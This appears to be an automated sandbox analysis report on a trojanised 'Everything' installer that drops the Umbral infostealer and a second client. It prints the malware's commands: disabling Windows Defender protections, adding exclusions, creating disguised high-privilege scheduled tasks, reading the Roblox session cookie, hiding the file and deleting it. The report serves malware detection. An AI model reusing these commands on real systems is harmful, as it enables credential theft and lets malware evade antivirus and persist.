Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
11/04/2025, 11:12
General
-
Target
Everything-1.4.1.1026.x64-Setup2.exe
-
Size
468KB
-
MD5
53e560338b0fabac1c89e7baf950046d
-
SHA1
517c82342d0e5ee0a581ff0db0e543c9cb9986a4
-
SHA256
c9d2459c5bd3e5044d4d625f92e30bfa475e11fe259fc00c0d4961f5ebe10f3b
-
SHA512
4216abf6d385c3f37889300dd9c8ec98215e7f8810806b2a306cd6e79747c720972b74026917ed5cc9a07e8c677aed2ad2ffc509290853eaa0ec4bc807a3843d
-
SSDEEP
12288:hGePVle8y4TKs/u6oZtL+EP855eLcCFdW8j+ctBIX0B:oITKoI8XeLcCFdW8j+ctBIXo
Malware Config
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/files/0x00080000000241fe-16.dat family_umbral behavioral1/memory/208-24-0x0000023B8B460000-0x0000023B8B4A0000-memory.dmp family_umbral behavioral1/memory/352-25-0x0000000000400000-0x000000000047C000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1032 powershell.exe 4276 powershell.exe 4848 powershell.exe 2152 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3078542121-369484597-920690335-1000\Control Panel\International\Geo\Nation Everything-1.4.1.1026.x64-Setup2.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Executes dropped EXE 2 IoCs
pid Process 3892 Client.exe 208 Umbral.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 8 discord.com 9 discord.com 11 pastebin.com 12 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com 16 icanhazip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Everything-1.4.1.1026.x64-Setup2.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1916 PING.EXE 2120 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3264 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1916 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 836 schtasks.exe 388 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 208 Umbral.exe 1032 powershell.exe 1032 powershell.exe 4276 powershell.exe 4276 powershell.exe 4848 powershell.exe 4848 powershell.exe 4796 powershell.exe 4796 powershell.exe 2152 powershell.exe 2152 powershell.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe 3892 Client.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3892 Client.exe Token: SeDebugPrivilege 208 Umbral.exe Token: SeIncreaseQuotaPrivilege 2888 wmic.exe Token: SeSecurityPrivilege 2888 wmic.exe Token: SeTakeOwnershipPrivilege 2888 wmic.exe Token: SeLoadDriverPrivilege 2888 wmic.exe Token: SeSystemProfilePrivilege 2888 wmic.exe Token: SeSystemtimePrivilege 2888 wmic.exe Token: SeProfSingleProcessPrivilege 2888 wmic.exe Token: SeIncBasePriorityPrivilege 2888 wmic.exe Token: SeCreatePagefilePrivilege 2888 wmic.exe Token: SeBackupPrivilege 2888 wmic.exe Token: SeRestorePrivilege 2888 wmic.exe Token: SeShutdownPrivilege 2888 wmic.exe Token: SeDebugPrivilege 2888 wmic.exe Token: SeSystemEnvironmentPrivilege 2888 wmic.exe Token: SeRemoteShutdownPrivilege 2888 wmic.exe Token: SeUndockPrivilege 2888 wmic.exe Token: SeManageVolumePrivilege 2888 wmic.exe Token: 33 2888 wmic.exe Token: 34 2888 wmic.exe Token: 35 2888 wmic.exe Token: 36 2888 wmic.exe Token: SeIncreaseQuotaPrivilege 2888 wmic.exe Token: SeSecurityPrivilege 2888 wmic.exe Token: SeTakeOwnershipPrivilege 2888 wmic.exe Token: SeLoadDriverPrivilege 2888 wmic.exe Token: SeSystemProfilePrivilege 2888 wmic.exe Token: SeSystemtimePrivilege 2888 wmic.exe Token: SeProfSingleProcessPrivilege 2888 wmic.exe Token: SeIncBasePriorityPrivilege 2888 wmic.exe Token: SeCreatePagefilePrivilege 2888 wmic.exe Token: SeBackupPrivilege 2888 wmic.exe Token: SeRestorePrivilege 2888 wmic.exe Token: SeShutdownPrivilege 2888 wmic.exe Token: SeDebugPrivilege 2888 wmic.exe Token: SeSystemEnvironmentPrivilege 2888 wmic.exe Token: SeRemoteShutdownPrivilege 2888 wmic.exe Token: SeUndockPrivilege 2888 wmic.exe Token: SeManageVolumePrivilege 2888 wmic.exe Token: 33 2888 wmic.exe Token: 34 2888 wmic.exe Token: 35 2888 wmic.exe Token: 36 2888 wmic.exe Token: SeDebugPrivilege 1032 powershell.exe Token: SeDebugPrivilege 4276 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeIncreaseQuotaPrivilege 5656 wmic.exe Token: SeSecurityPrivilege 5656 wmic.exe Token: SeTakeOwnershipPrivilege 5656 wmic.exe Token: SeLoadDriverPrivilege 5656 wmic.exe Token: SeSystemProfilePrivilege 5656 wmic.exe Token: SeSystemtimePrivilege 5656 wmic.exe Token: SeProfSingleProcessPrivilege 5656 wmic.exe Token: SeIncBasePriorityPrivilege 5656 wmic.exe Token: SeCreatePagefilePrivilege 5656 wmic.exe Token: SeBackupPrivilege 5656 wmic.exe Token: SeRestorePrivilege 5656 wmic.exe Token: SeShutdownPrivilege 5656 wmic.exe Token: SeDebugPrivilege 5656 wmic.exe Token: SeSystemEnvironmentPrivilege 5656 wmic.exe Token: SeRemoteShutdownPrivilege 5656 wmic.exe Token: SeUndockPrivilege 5656 wmic.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 352 wrote to memory of 3892 352 Everything-1.4.1.1026.x64-Setup2.exe 85 PID 352 wrote to memory of 3892 352 Everything-1.4.1.1026.x64-Setup2.exe 85 PID 352 wrote to memory of 208 352 Everything-1.4.1.1026.x64-Setup2.exe 86 PID 352 wrote to memory of 208 352 Everything-1.4.1.1026.x64-Setup2.exe 86 PID 208 wrote to memory of 2888 208 Umbral.exe 88 PID 208 wrote to memory of 2888 208 Umbral.exe 88 PID 208 wrote to memory of 3936 208 Umbral.exe 90 PID 208 wrote to memory of 3936 208 Umbral.exe 90 PID 208 wrote to memory of 1032 208 Umbral.exe 92 PID 208 wrote to memory of 1032 208 Umbral.exe 92 PID 208 wrote to memory of 4276 208 Umbral.exe 94 PID 208 wrote to memory of 4276 208 Umbral.exe 94 PID 208 wrote to memory of 4848 208 Umbral.exe 96 PID 208 wrote to memory of 4848 208 Umbral.exe 96 PID 208 wrote to memory of 4796 208 Umbral.exe 98 PID 208 wrote to memory of 4796 208 Umbral.exe 98 PID 208 wrote to memory of 5656 208 Umbral.exe 100 PID 208 wrote to memory of 5656 208 Umbral.exe 100 PID 208 wrote to memory of 4948 208 Umbral.exe 102 PID 208 wrote to memory of 4948 208 Umbral.exe 102 PID 208 wrote to memory of 1500 208 Umbral.exe 104 PID 208 wrote to memory of 1500 208 Umbral.exe 104 PID 208 wrote to memory of 2152 208 Umbral.exe 106 PID 208 wrote to memory of 2152 208 Umbral.exe 106 PID 208 wrote to memory of 3264 208 Umbral.exe 108 PID 208 wrote to memory of 3264 208 Umbral.exe 108 PID 208 wrote to memory of 2120 208 Umbral.exe 110 PID 208 wrote to memory of 2120 208 Umbral.exe 110 PID 2120 wrote to memory of 1916 2120 cmd.exe 112 PID 2120 wrote to memory of 1916 2120 cmd.exe 112 PID 3892 wrote to memory of 3444 3892 Client.exe 113 PID 3892 wrote to memory of 3444 3892 Client.exe 113 PID 3444 wrote to memory of 836 3444 CMD.exe 115 PID 3444 wrote to memory of 836 3444 CMD.exe 115 PID 3892 wrote to memory of 2852 3892 Client.exe 116 PID 3892 wrote to memory of 2852 3892 Client.exe 116 PID 2852 wrote to memory of 388 2852 CMD.exe 118 PID 2852 wrote to memory of 388 2852 CMD.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3936 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup2.exe"C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup2.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:352 -
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Security Essentials" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Security Essentials" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:3936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5656
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:4948
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2152
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:3264
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1916
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:5924
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5547df619456b0e94d1b7663cf2f93ccb
SHA18807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3
SHA2568b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a
SHA51201b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f
-
Filesize
1KB
MD58bb4d69f68c8948fce3ec1e261dff619
SHA1bf12e2852763f984f0496c941d16f9ba899e7f37
SHA256ee84ee0ae4a0f1016bc36e2c180bfb82d7c877c5695fc51476cce9b1d0b20632
SHA512d23233d97660bf6568af2cfd7a45aa6e26bf76437dbfca0d460ca3d232f30d5fcfedb7c487418df985992b420e156e30e1482b13c94052e92b95afd1f2682519
-
Filesize
64B
MD5c41224ab6e2a713aff7b0128890716be
SHA1b3525f9c3f583284b084fb88ae14a803fad84e04
SHA256ee0f2a4ee399ef57c54d83bd611d11fb22ce2edc405db819a2a371b8a5192fd2
SHA51225c71ac3f2ee6b0ccadd7549b7d8a42a964d0305d8758dfae53ce78eeaf52432380715ff545d95645e0e00d3b3b6c678f17eb16b2e9606d64988ffde82dfbc4c
-
Filesize
944B
MD53332c2f747b79a54dc9f4867423e31c3
SHA1de8440945ab0c382b6657dd2e6f50bbc2a4b73bd
SHA256f8ddc8eddb53247304e5463829cbf8d1a420a77781237820efa0c94ab18612cd
SHA51296fcc7c39335ce60da1f8db2ff9b62324d60080fb1a5a81262a26c311b78117bf85b481113800f88ac6a37b7ba26a7be510f3c098b26828c751974339a1e8835
-
Filesize
948B
MD5f4bf3ca8753d6bb9725419fec1ec74b9
SHA171fce9d17d1d92873236a9a827c52eb9e4827f3d
SHA256ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417
SHA512a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
228KB
MD59d13457fe2154ed1c7c5d080b4e89d75
SHA1813a1143530624a7ebb51eb041d8ab1b1349c428
SHA2564433cbb68bb1948a9093af9d3e4ca43dd9d2e8ab1eb4ef172c84a18122211dbb
SHA5124665ce02912a5d27a847b91fc7dc1a1cd215febe16fa2bd9d90694a9ce45d5475255cdd0d9e2d57c00b61bbdd94ffce6e71227d04530544591043216be48341b
-
Filesize
231KB
MD5e4b51d29d135168fc262065999c10f6a
SHA18f7d8872ee04c47af338ea0fe8480a3e5be2d6bb
SHA25672717c89182aa16055fca98ccb899f86084a888681cd5621dcdba99d08056c7c
SHA512d539a85bdbd0bcaa52ed8483d124f61875eb1b28d5bd353087eee1332efd3bf948fcd672e77b06755ccb4af7c1783db87091d99f78da41f12f8187fd22927fb6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82